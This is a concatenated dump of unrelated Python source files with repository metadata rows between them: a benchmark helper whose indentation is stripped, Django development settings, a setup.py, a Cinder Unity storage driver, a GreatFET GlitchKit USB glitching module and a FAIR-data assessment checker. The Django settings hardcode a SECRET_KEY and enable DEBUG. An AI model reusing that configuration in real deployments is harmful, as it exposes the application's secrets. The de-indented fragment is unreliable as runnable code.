# Running the test should write foo.etl, foo.yaml, and possibly others (e.g. log files)
out: TestPaths
@property
def coreclr_name(self) -> str:
return self.test.coreclr_name
@property
def coreclr(self) -> CoreclrSpecifier:
return self.test.coreclr.coreclr
@property
def config_name(self) -> str:
return self.test.config_name
@property
def config(self) -> TestConfigCombined:
return TestConfigCombined(self.test.config.config)
@property
def benchmark_name(self) -> str:
return self.test.benchmark_name
@property
def benchmark(self) -> Benchmark:
return self.test.benchmark.benchmark
def iter_test_combinations(
bench_file: BenchFile, machines: Sequence[Machine]
) -> Iterable[SingleTestCombination]:
for machine in machines:
for coreclr in bench_file.coreclrs_and_names:
for config in bench_file.partial_configs_and_names:
for benchmark in bench_file.benchmarks_and_names:
yield SingleTestCombination(machine, coreclr, config, benchmark)
def iter_tests_to_run(
bench: BenchFileAndPath,
machine: Machine,
max_iterations: Optional[int],
out_dir: Optional[Path],
) -> Iterable[SingleTestToRun]:
bench_file = bench.content
for t in iter_test_combinations(bench.content, (machine,)):
if (
t.benchmark.benchmark.only_configs is None
or t.config_name in t.benchmark.benchmark.only_configs
):
for i, out_paths in enumerate(
get_test_paths_for_each_iteration(bench, t, max_iterations, out_dir)
):
yield SingleTestToRun(
bench_file=bench_file,
test=SingleTestCombination(
machine=machine,
coreclr=t.coreclr,
config=PartialConfigAndName(
name=t.config_name,
config=combine_test_configs(
bench_file.common_config, t.config.config
).cfg,
),
benchmark=t.benchmark,
),
iteration=i,
out=out_paths,
)
def get_iteration_count(
bench: BenchFile, benchmark: Benchmark, max_iterations: Optional[int]
) -> int:
assert (
benchmark.iteration_count != 0
and bench.options.default_iteration_count != 0
and max_iterations != 0
)
i = option_or_3(benchmark.iteration_count, bench.options.default_iteration_count, 1)
return min(i, max_iterations) if max_iterations is not None else i
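# For example, with benchmark.iteration_count=None,
# default_iteration_count=8 and max_iterations=3, the fallback chain picks 8
# and the --max-iterations cap reduces it to 3.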
# Returns a TestPaths for each iteration
def get_test_paths_for_each_iteration(
bench: BenchFileAndPath,
t: SingleTestCombination,
max_iterations: Optional[int],
out_dir: Optional[Path] = None,
) -> Sequence[TestPaths]:
n_iters = get_iteration_count(bench.content, t.benchmark.benchmark, max_iterations)
return [get_test_path(bench, t, i, out_dir) for i in range(n_iters)]
def get_test_path(
bench: BenchFileAndPath,
t: SingleTestCombination,
iteration: int,
out_dir: Optional[Path] = None,
) -> TestPaths:
out = out_dir_for_bench_yaml(bench.path, t.machine) if out_dir is None else out_dir
return TestPaths(out / f"{t.coreclr.name}__{t.config.name}__{t.benchmark.name}__{iteration}")
def combine_test_configs(
common_config: Optional[Config], named_config: Config
) -> TestConfigCombined:
return TestConfigCombined(
combine_dataclasses_with_optional_fields(Config, named_config, common_config)
)
def get_coreclr(bench_file: BenchFile, coreclr_name: Optional[str]) -> CoreclrAndName:
return find_only_or_only_matching(
lambda cn: cn.name, "--coreclr", coreclr_name, bench_file.coreclrs_and_names
)
def get_config(bench_file: BenchFile, config_name: Optional[str]) -> FullConfigAndName:
return find_only_or_only_matching(
lambda cn: cn.name, "--config-name", config_name, bench_file.full_configs_and_names
)
def get_benchmark(bench_file: BenchFile, benchmark_name: Optional[str]) -> BenchmarkAndName:
return find_only_or_only_matching(
lambda bn: bn.name, "--benchmark-name", benchmark_name, bench_file.benchmarks_and_names
)
def try_find_benchfile_from_trace_file_path(path: Path) -> Optional[BenchFileAndPath]:
parent = path.parent
name = try_remove_str_end(parent.name, ".out")
if name is None:
return None
else:
assert name.endswith(".yaml")
bench_path = parent.parent / name
return parse_bench_file(parent.parent / name) if bench_path.exists() else None
| 31.515471
| 100
| 0.674729
|
2f6cfdca2157309f9f6e99240875b43502de7847
| 3,192
|
py
|
Python
|
profiles_project/settings.py
|
evansjethro/profiles-rest-api
|
ae07be9ce5d48f63a96afed772db71e4488664af
|
[
"MIT"
] | null | null | null |
profiles_project/settings.py
|
evansjethro/profiles-rest-api
|
ae07be9ce5d48f63a96afed772db71e4488664af
|
[
"MIT"
] | 4
|
2021-03-19T01:30:22.000Z
|
2021-06-10T18:49:13.000Z
|
profiles_project/settings.py
|
evansjethro/profiles-rest-api
|
ae07be9ce5d48f63a96afed772db71e4488664af
|
[
"MIT"
] | null | null | null |
"""
Django settings for profiles_project project.
Generated by 'django-admin startproject' using Django 3.0.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '@)bd3#a6y3n1zwzpwsu)_ps8t7@7w7v(y(61m@ka*tu!zftpg*'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'profiles_api',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'profiles_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'profiles_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
| 25.741935
| 91
| 0.698308
|
35f4c2e254621d07c3b86b8a2565f9ce2ebde682
| 327
|
py
|
Python
|
setup.py
|
gsmadi/trinity-sentry-plugin
|
64f622eee97fe072240711cace13ff232565d2ff
|
[
"MIT"
] | null | null | null |
setup.py
|
gsmadi/trinity-sentry-plugin
|
64f622eee97fe072240711cace13ff232565d2ff
|
[
"MIT"
] | null | null | null |
setup.py
|
gsmadi/trinity-sentry-plugin
|
64f622eee97fe072240711cace13ff232565d2ff
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup
setup(
name='trinity-sentry-plugin',
version='0.1.0',
py_modules=['sentry_plugin'],
entry_points={
'trinity.plugins': 'sentry_plugin=sentry_plugin:SentryPlugin',
},
install_requires=[
'sentry-sdk==0.7.9'
]
)
| 21.8
| 70
| 0.620795
|
80c91c4b51a96e370a419f81acfe2ee024f7e31b
| 8,282
|
py
|
Python
|
cinder/volume/drivers/dell_emc/unity/driver.py
|
j-griffith/cinder
|
902719a46ed9b8f84f9753bd624ad59b5a968134
|
[
"Apache-2.0"
] | null | null | null |
cinder/volume/drivers/dell_emc/unity/driver.py
|
j-griffith/cinder
|
902719a46ed9b8f84f9753bd624ad59b5a968134
|
[
"Apache-2.0"
] | null | null | null |
cinder/volume/drivers/dell_emc/unity/driver.py
|
j-griffith/cinder
|
902719a46ed9b8f84f9753bd624ad59b5a968134
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2016 Dell Inc. or its subsidiaries.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Cinder Driver for Unity"""
from oslo_config import cfg
from oslo_log import log as logging
from cinder import interface
from cinder.volume import configuration
from cinder.volume import driver
from cinder.volume.drivers.dell_emc.unity import adapter
from cinder.volume.drivers.san.san import san_opts
from cinder.zonemanager import utils as zm_utils
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
UNITY_OPTS = [
cfg.ListOpt('unity_storage_pool_names',
default=None,
help='A comma-separated list of storage pool names to be '
'used.'),
cfg.ListOpt('unity_io_ports',
default=None,
help='A comma-separated list of iSCSI or FC ports to be used. '
'Each port can be Unix-style glob expressions.')]
CONF.register_opts(UNITY_OPTS, group=configuration.SHARED_CONF_GROUP)
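# A hypothetical cinder.conf backend section using these options might look like:
#
#   [unity_backend]
#   volume_driver = cinder.volume.drivers.dell_emc.unity.driver.UnityDriver
#   storage_protocol = FC
#   unity_storage_pool_names = pool_a,pool_b
#   unity_io_ports = spa_eth*,spb_eth*
#
# (the section name and values are illustrative, not taken from a real deployment)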
@interface.volumedriver
class UnityDriver(driver.ManageableVD,
driver.ManageableSnapshotsVD,
driver.BaseVD):
"""Unity Driver.
Version history:
1.0.0 - Initial version
2.0.0 - Add thin clone support
3.0.0 - Add IPv6 support
3.1.0 - Support revert to snapshot API
"""
VERSION = '03.01.00'
VENDOR = 'Dell EMC'
# ThirdPartySystems wiki page
CI_WIKI_NAME = "EMC_UNITY_CI"
def __init__(self, *args, **kwargs):
super(UnityDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(UNITY_OPTS)
self.configuration.append_config_values(san_opts)
protocol = self.configuration.storage_protocol
if protocol.lower() == adapter.PROTOCOL_FC.lower():
self.protocol = adapter.PROTOCOL_FC
self.adapter = adapter.FCAdapter(self.VERSION)
else:
self.protocol = adapter.PROTOCOL_ISCSI
self.adapter = adapter.ISCSIAdapter(self.VERSION)
def do_setup(self, context):
self.adapter.do_setup(self, self.configuration)
def check_for_setup_error(self):
pass
def create_volume(self, volume):
"""Creates a volume."""
return self.adapter.create_volume(volume)
def create_volume_from_snapshot(self, volume, snapshot):
"""Creates a volume from a snapshot."""
return self.adapter.create_volume_from_snapshot(volume, snapshot)
def create_cloned_volume(self, volume, src_vref):
"""Creates a cloned volume."""
return self.adapter.create_cloned_volume(volume, src_vref)
def extend_volume(self, volume, new_size):
"""Extend a volume."""
self.adapter.extend_volume(volume, new_size)
def delete_volume(self, volume):
"""Deletes a volume."""
self.adapter.delete_volume(volume)
def create_snapshot(self, snapshot):
"""Creates a snapshot."""
self.adapter.create_snapshot(snapshot)
def delete_snapshot(self, snapshot):
"""Deletes a snapshot."""
self.adapter.delete_snapshot(snapshot)
def ensure_export(self, context, volume):
"""Driver entry point to get the export info for an existing volume."""
pass
def create_export(self, context, volume, connector):
"""Driver entry point to get the export info for a new volume."""
pass
def remove_export(self, context, volume):
"""Driver entry point to remove an export for a volume."""
pass
def check_for_export(self, context, volume_id):
"""Make sure volume is exported."""
pass
@zm_utils.add_fc_zone
def initialize_connection(self, volume, connector):
"""Initializes the connection and returns connection info.
Assign any created volume to a compute node/host so that it can be
used from that host.
The driver returns a driver_volume_type of 'fibre_channel'.
The target_wwn can be a single entry or a list of wwns that
correspond to the list of remote wwn(s) that will export the volume.
The initiator_target_map is a map that represents the remote wwn(s)
and a list of wwns which are visible to the remote wwn(s).
Example return values:
FC:
.. code-block:: json
{
'driver_volume_type': 'fibre_channel'
'data': {
'target_discovered': True,
'target_lun': 1,
'target_wwn': ['1234567890123', '0987654321321'],
'initiator_target_map': {
'1122334455667788': ['1234567890123',
'0987654321321']
}
}
}
iSCSI:
.. code-block:: json
{
'driver_volume_type': 'iscsi'
'data': {
'target_discovered': True,
'target_iqns': ['iqn.2010-10.org.openstack:volume-00001',
'iqn.2010-10.org.openstack:volume-00002'],
'target_portals': ['127.0.0.1:3260', '127.0.1.1:3260'],
'target_luns': [1, 1],
}
}
"""
return self.adapter.initialize_connection(volume, connector)
@zm_utils.remove_fc_zone
def terminate_connection(self, volume, connector, **kwargs):
"""Disallow connection from connector."""
return self.adapter.terminate_connection(volume, connector)
def get_volume_stats(self, refresh=False):
"""Get volume stats.
:param refresh: True to get updated data
"""
if refresh:
self.update_volume_stats()
return self._stats
def update_volume_stats(self):
"""Retrieve stats info from volume group."""
LOG.debug("Updating volume stats.")
stats = self.adapter.update_volume_stats()
stats['driver_version'] = self.VERSION
stats['vendor_name'] = self.VENDOR
self._stats = stats
def manage_existing(self, volume, existing_ref):
"""Manages an existing LUN in the array.
:param volume: the mapping cinder volume of the Unity LUN.
:param existing_ref: the Unity LUN info.
"""
return self.adapter.manage_existing(volume, existing_ref)
def manage_existing_get_size(self, volume, existing_ref):
"""Returns size of volume to be managed by manage_existing."""
return self.adapter.manage_existing_get_size(volume, existing_ref)
def get_pool(self, volume):
"""Returns the pool name of a volume."""
return self.adapter.get_pool_name(volume)
def unmanage(self, volume):
"""Unmanages a volume."""
pass
def backup_use_temp_snapshot(self):
return True
def create_export_snapshot(self, context, snapshot, connector):
"""Creates the mount point of the snapshot for backup.
Not necessary to create on Unity.
"""
pass
def remove_export_snapshot(self, context, snapshot):
"""Deletes the mount point the snapshot for backup.
Not necessary to create on Unity.
"""
pass
def initialize_connection_snapshot(self, snapshot, connector, **kwargs):
return self.adapter.initialize_connection_snapshot(snapshot, connector)
def terminate_connection_snapshot(self, snapshot, connector, **kwargs):
return self.adapter.terminate_connection_snapshot(snapshot, connector)
def revert_to_snapshot(self, context, volume, snapshot):
"""Reverts a volume to a snapshot."""
return self.adapter.restore_snapshot(volume, snapshot)
| 34.22314
| 79
| 0.636923
|
a8932ec26cfa3a12800a3dba3021888658994583
| 3,638
|
py
|
Python
|
host/greatfet/glitchkit/usb.py
|
grvvy/greatfet
|
e8098307960a60e34c27ed2903f7abc2252b4cce
|
[
"BSD-3-Clause"
] | 328
|
2015-08-30T03:10:50.000Z
|
2022-03-31T12:47:48.000Z
|
host/greatfet/glitchkit/usb.py
|
grvvy/greatfet
|
e8098307960a60e34c27ed2903f7abc2252b4cce
|
[
"BSD-3-Clause"
] | 231
|
2017-02-11T23:21:31.000Z
|
2022-03-27T23:07:43.000Z
|
host/greatfet/glitchkit/usb.py
|
grvvy/greatfet
|
e8098307960a60e34c27ed2903f7abc2252b4cce
|
[
"BSD-3-Clause"
] | 94
|
2015-09-27T15:01:04.000Z
|
2022-02-26T15:41:20.000Z
|
#
# This file is part of GreatFET
#
from __future__ import absolute_import
import usb
import time
import codecs
from .base import GlitchKitModule
from ..protocol import vendor_requests
# Quirk constant that helps us identify libusb's pipe errors, which bubble
# up as generic USBErrors with errno 60 on affected platforms.
LIBUSB_TIMEOUT = 60
LIBUSB_IO_ERROR = 5
class GlitchKitUSB(GlitchKitModule):
"""
"""
SHORT_NAME = 'usb'
HOST_TRANSFER_QUEUED = 0x002
HOST_SETUP_TRANSFER_QUEUED = 0x004
HOST_IN_TRANSFER_QUEUED = 0x008
HOST_OUT_TRANSFER_QUEUED = 0x010
HOST_TRANSFER_COMPLETE = 0x020
HOST_SETUP_TRANSFER_COMPLETE = 0x040
HOST_IN_TRANSFER_COMPLETE = 0x100
HOST_OUT_TRANSFER_COMPLETE = 0x080
DEVICE_TRANSFER_COMPLETE = 0x200
VBUS_ENABLED = 0x400
READ_INCOMPLETE = 0xFFFFFFFF
PRE_RESPONSE_DELAY = 0.01
# TODO: Figure out what should be in here vs in FaceDancer.
GET_DESCRIPTOR = 0x6
GET_DEVICE_DESCRIPTOR = 1 << 8
def __init__(self, board):
"""
Create a new GlitchKit module allowing inducing or waiting for USB
events, and then glitching.
Args:
board -- A representation of the GreatFET that will perform the actual
triggering.
"""
# Store a reference to the parent board.
self.board = board
self.api = board.apis.glitchkit_usb
@staticmethod
def supports_board(board):
""" Determines if this GreatFET supports GlitchKit via USB. """
return board.supports_api("glitchkit_usb")
def configure_future_requests(self, continue_despite_errors, disable_vbus_afterwards):
""" Configure future requests made by this GlitchKit module.
Arguments:
continue_despite_errors -- True iff stimuli should continue even
if errors occur.
disable_vbus_afterwards -- If set, VBUS will be disconnected after
a given USB request.
"""
self.api.configure_requests(continue_despite_errors, disable_vbus_afterwards)
@staticmethod
def _split(value):
# TODO: get rid of this
value_high = value >> 8
value_low = value & 0xFF
return [value_low, value_high]
@staticmethod
def build_request_type(is_in, type, recipient):
# TODO: FIXME: clean up consts
request_type = 0
if is_in:
request_type |= (1 << 7)
request_type |= (type << 5)
request_type |= (recipient)
return request_type
def build_setup_request(self, is_in=True, request_type=0, recipient=0, request=0, value=0, index=0, length=0):
# uint8_t request_type;
# uint8_t request;
# uint16_t value;
# uint16_t index;
# uint16_t length;
# TODO: replace me with a call to struct.pack?
setup_request = [self.build_request_type(is_in, request_type, recipient), request]
setup_request.extend(self._split(value))
setup_request.extend(self._split(index))
setup_request.extend(self._split(length))
return setup_request
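# For example, a standard GET_DESCRIPTOR request for the 18-byte device
# descriptor would be built as:
#   build_setup_request(is_in=True, request=self.GET_DESCRIPTOR,
#                       value=self.GET_DEVICE_DESCRIPTOR, length=18)
#   -> [0x80, 0x06, 0x00, 0x01, 0x00, 0x00, 0x12, 0x00]
# (bmRequestType, bRequest, then little-endian wValue, wIndex, wLength).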
def capture_control_in(self, request_type=0, recipient=0, request=0, value=0, index=0, length=0, timeout=30, ui_event_call=False):
# Build a setup packet...
setup_packet = bytes(self.build_setup_request(True, request_type, recipient, request, value, index, length))
# ... and issue the request.
return self.api.control_in(setup_packet, timeout=timeout * 1024)
| 28.20155
| 134
| 0.653931
|
8b06d8fc5ed8b8105fc46a7d5af782f9dbeb66fa
| 39,808
|
py
|
Python
|
fuji_server/controllers/fair_check.py
|
EOSC-synergy/FUJI_pipeline.sqaaas
|
589e8cc831c58d985076bf924b4ce1571c87209b
|
[
"MIT"
] | null | null | null |
fuji_server/controllers/fair_check.py
|
EOSC-synergy/FUJI_pipeline.sqaaas
|
589e8cc831c58d985076bf924b4ce1571c87209b
|
[
"MIT"
] | null | null | null |
fuji_server/controllers/fair_check.py
|
EOSC-synergy/FUJI_pipeline.sqaaas
|
589e8cc831c58d985076bf924b4ce1571c87209b
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# MIT License
#
# Copyright (c) 2020 PANGAEA (https://www.pangaea.de/)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import io
import logging
import mimetypes
import re
import sys
import urllib.request as urllib
from typing import List, Any
from urllib.parse import urlparse
import Levenshtein
import idutils
import lxml
import rdflib
from rdflib.namespace import RDF
from rdflib.namespace import DCTERMS
from rdflib.namespace import DC
from rapidfuzz import fuzz
from rapidfuzz import process
from tika import parser
import hashlib
from fuji_server.evaluators.fair_evaluator_license import FAIREvaluatorLicense
from fuji_server.evaluators.fair_evaluator_data_access_level import FAIREvaluatorDataAccessLevel
from fuji_server.evaluators.fair_evaluator_persistent_identifier import FAIREvaluatorPersistentIdentifier
from fuji_server.evaluators.fair_evaluator_unique_identifier import FAIREvaluatorUniqueIdentifier
from fuji_server.evaluators.fair_evaluator_minimal_metadata import FAIREvaluatorCoreMetadata
from fuji_server.evaluators.fair_evaluator_content_included import FAIREvaluatorContentIncluded
from fuji_server.evaluators.fair_evaluator_related_resources import FAIREvaluatorRelatedResources
from fuji_server.evaluators.fair_evaluator_searchable import FAIREvaluatorSearchable
from fuji_server.evaluators.fair_evaluator_file_format import FAIREvaluatorFileFormat
from fuji_server.evaluators.fair_evaluator_data_provenance import FAIREvaluatorDataProvenance
from fuji_server.evaluators.fair_evaluator_data_content_metadata import FAIREvaluatorDataContentMetadata
from fuji_server.evaluators.fair_evaluator_formal_metadata import FAIREvaluatorFormalMetadata
from fuji_server.evaluators.fair_evaluator_semantic_vocabulary import FAIREvaluatorSemanticVocabulary
from fuji_server.evaluators.fair_evaluator_metadata_preservation import FAIREvaluatorMetadataPreserved
from fuji_server.evaluators.fair_evaluator_community_metadata import FAIREvaluatorCommunityMetadata
from fuji_server.evaluators.fair_evaluator_standardised_protocol_data import FAIREvaluatorStandardisedProtocolData
from fuji_server.evaluators.fair_evaluator_standardised_protocol_metadata import FAIREvaluatorStandardisedProtocolMetadata
from fuji_server.helper.metadata_collector import MetaDataCollector
from fuji_server.helper.metadata_collector_datacite import MetaDataCollectorDatacite
from fuji_server.helper.metadata_collector_dublincore import MetaDataCollectorDublinCore
from fuji_server.helper.metadata_collector_microdata import MetaDataCollectorMicroData
from fuji_server.helper.metadata_collector_opengraph import MetaDataCollectorOpenGraph
from fuji_server.helper.metadata_collector_rdf import MetaDataCollectorRdf
from fuji_server.helper.metadata_collector_schemaorg import MetaDataCollectorSchemaOrg
from fuji_server.helper.metadata_collector_xml import MetaDataCollectorXML
from fuji_server.helper.metadata_mapper import Mapper
from fuji_server.helper.metadata_provider_oai import OAIMetadataProvider
from fuji_server.helper.metadata_provider_sparql import SPARQLMetadataProvider
from fuji_server.helper.preprocessor import Preprocessor
from fuji_server.helper.repository_helper import RepositoryHelper
class FAIRCheck:
METRICS = None
SPDX_LICENSES = None
SPDX_LICENSE_NAMES = None
COMMUNITY_STANDARDS_NAMES = None
COMMUNITY_METADATA_STANDARDS_URIS = None
COMMUNITY_METADATA_STANDARDS_URIS_LIST = None
COMMUNITY_STANDARDS = None
SCIENCE_FILE_FORMATS = None
LONG_TERM_FILE_FORMATS = None
OPEN_FILE_FORMATS = None
DEFAULT_NAMESPACES = None
VOCAB_NAMESPACES = None
ARCHIVE_MIMETYPES = Mapper.ARCHIVE_COMPRESS_MIMETYPES.value
STANDARD_PROTOCOLS = None
SCHEMA_ORG_CONTEXT = []
FILES_LIMIT = None
LOG_SUCCESS = 25
VALID_RESOURCE_TYPES = []
FUJI_VERSION = 'v1.0.5c'
def __init__(self, uid, test_debug=False, oaipmh=None, use_datacite=True):
uid_bytes = uid.encode('utf-8')
self.test_id = hashlib.sha1(uid_bytes).hexdigest()
#str(base64.urlsafe_b64encode(uid_bytes), "utf-8") # an id we can use for caching etc
self.id = uid
self.oaipmh_endpoint = oaipmh
self.pid_url = None # full pid, e.g. https://doi.org/10.1594/pangaea.906092, or a plain url (non-pid)
self.landing_url = None # url of the landing page of self.pid_url
self.origin_url = None # the url where everything starts - in case of redirection we'll need this later on
self.landing_html = None
self.landing_origin = None # schema + authority of the landing page e.g. https://www.pangaea.de
self.signposting_header_links = []
self.pid_scheme = None
self.id_scheme= None
self.logger = logging.getLogger(__name__)
self.metadata_sources = []
self.isDebug = test_debug
self.isMetadataAccessible = None
self.metadata_merged = {}
self.content_identifier=[]
self.community_standards = []
self.community_standards_uri = {}
self.namespace_uri=[]
self.reference_elements = Mapper.REFERENCE_METADATA_LIST.value.copy() # all metadata elements required for FUJI metrics
self.related_resources = []
# self.test_data_content_text = None# a helper to check metadata against content
self.rdf_graph = None
self.sparql_endpoint = None
self.rdf_collector = None
self.use_datacite = use_datacite
self.repeat_pid_check = False
self.logger_message_stream = io.StringIO()
logging.addLevelName(self.LOG_SUCCESS, 'SUCCESS')
if self.isDebug:
self.logStreamHandler = logging.StreamHandler(self.logger_message_stream)
formatter = logging.Formatter('%(message)s|%(levelname)s')
self.logStreamHandler.setFormatter(formatter)
self.logger.propagate = False
self.logger.setLevel(logging.INFO) # set to debug in testing environment
self.logger.addHandler(self.logStreamHandler)
self.count = 0
FAIRCheck.load_predata()
self.extruct = None
self.extruct_result = None
self.tika_content_types_list = []
@classmethod
def load_predata(cls):
cls.FILES_LIMIT = Preprocessor.data_files_limit
if not cls.METRICS:
cls.METRICS = Preprocessor.get_custom_metrics(['metric_name', 'total_score','metric_tests'])
if not cls.SPDX_LICENSES:
# cls.SPDX_LICENSES, cls.SPDX_LICENSE_NAMES, cls.SPDX_LICENSE_URLS = Preprocessor.get_licenses()
cls.SPDX_LICENSES, cls.SPDX_LICENSE_NAMES = Preprocessor.get_licenses()
if not cls.COMMUNITY_METADATA_STANDARDS_URIS:
cls.COMMUNITY_METADATA_STANDARDS_URIS = Preprocessor.get_metadata_standards_uris()
cls.COMMUNITY_METADATA_STANDARDS_URIS_LIST = list(cls.COMMUNITY_METADATA_STANDARDS_URIS.keys())
if not cls.COMMUNITY_STANDARDS:
cls.COMMUNITY_STANDARDS = Preprocessor.get_metadata_standards()
cls.COMMUNITY_STANDARDS_NAMES = list(cls.COMMUNITY_STANDARDS.keys())
if not cls.SCIENCE_FILE_FORMATS:
cls.SCIENCE_FILE_FORMATS = Preprocessor.get_science_file_formats()
if not cls.LONG_TERM_FILE_FORMATS:
cls.LONG_TERM_FILE_FORMATS = Preprocessor.get_long_term_file_formats()
if not cls.OPEN_FILE_FORMATS:
cls.OPEN_FILE_FORMATS = Preprocessor.get_open_file_formats()
if not cls.DEFAULT_NAMESPACES:
cls.DEFAULT_NAMESPACES = Preprocessor.getDefaultNamespaces()
if not cls.VOCAB_NAMESPACES:
cls.VOCAB_NAMESPACES = Preprocessor.getLinkedVocabs()
if not cls.STANDARD_PROTOCOLS:
cls.STANDARD_PROTOCOLS = Preprocessor.get_standard_protocols()
if not cls.SCHEMA_ORG_CONTEXT:
cls.SCHEMA_ORG_CONTEXT = Preprocessor.get_schema_org_context()
if not cls.VALID_RESOURCE_TYPES:
cls.VALID_RESOURCE_TYPES = Preprocessor.get_resource_types()
@staticmethod
def uri_validator(u): # TODO integrate into request_helper.py
try:
r = urlparse(u)
return all([r.scheme, r.netloc])
except:
return False
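# Illustrative behaviour (added note, not in the original source): the check requires
# both a scheme and a netloc, so uri_validator('https://doi.org/10.1594/x') is True
# while uri_validator('doi.org/10.1594/x') is False because the scheme is missing.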
def retrieve_metadata(self, extruct_metadata):
if isinstance(extruct_metadata, dict):
embedded_exists = {k: v for k, v in extruct_metadata.items() if v}
self.extruct = embedded_exists.copy()
if embedded_exists: # retrieve metadata from landing page
self.logger.info(
'FsF-F2-01M : Formats of structured metadata embedded in HTML markup - {}'.format(
list(embedded_exists.keys())))
self.retrieve_metadata_embedded(embedded_exists)
else:
self.logger.warning('FsF-F2-01M : NO structured metadata embedded in HTML')
if self.reference_elements: # this will be always true as we need datacite client id
self.retrieve_metadata_external()
# ========= clean merged metadata, delete all entries which are None or ''
data_objects = self.metadata_merged.get('object_content_identifier')
if data_objects == {'url': None} or data_objects == [None]:
data_objects = self.metadata_merged['object_content_identifier'] = None
if data_objects is not None:
if not isinstance(data_objects, list):
self.metadata_merged['object_content_identifier']=[data_objects]
# TODO quick-fix to merge size information - should do it at mapper
if 'object_content_identifier' in self.metadata_merged:
if self.metadata_merged.get('object_content_identifier'):
for c in self.metadata_merged['object_content_identifier']:
if not c.get('size') and self.metadata_merged.get('object_size'):
c['size'] = self.metadata_merged.get('object_size')
for mk, mv in list(self.metadata_merged.items()):
if mv == '' or mv is None:
del self.metadata_merged[mk]
self.logger.info('FsF-F2-01M : Type of object described by the metadata - {}'.format(self.metadata_merged.get('object_type')))
# detect api and standards
self.retrieve_apis_standards()
# remove duplicates
if self.namespace_uri:
self.namespace_uri = list(set(self.namespace_uri))
def retrieve_apis_standards(self):
if self.landing_url is not None:
self.logger.info('FsF-R1.3-01M : Retrieving API and Standards')
client_id = self.metadata_merged.get('datacite_client')
self.logger.info('FsF-R1.3-01M : re3data/datacite client id - {}'.format(client_id))
if self.oaipmh_endpoint:
self.logger.info('{} : OAI-PMH endpoint provided as part of the request.'.format('FsF-R1.3-01M'))
else:
#find endpoint via datacite/re3data if pid is provided
if client_id and self.pid_scheme:
self.logger.info('{} : Inferring endpoint information through re3data/datacite services'.format('FsF-R1.3-01M'))
repoHelper = RepositoryHelper(client_id, self.pid_scheme)
repoHelper.lookup_re3data()
self.oaipmh_endpoint = repoHelper.getRe3MetadataAPIs().get('OAI-PMH')
self.sparql_endpoint = repoHelper.getRe3MetadataAPIs().get('SPARQL')
self.community_standards.extend(repoHelper.getRe3MetadataStandards())
self.logger.info('{} : Metadata standards listed in re3data record - {}'.format('FsF-R1.3-01M', self.community_standards ))
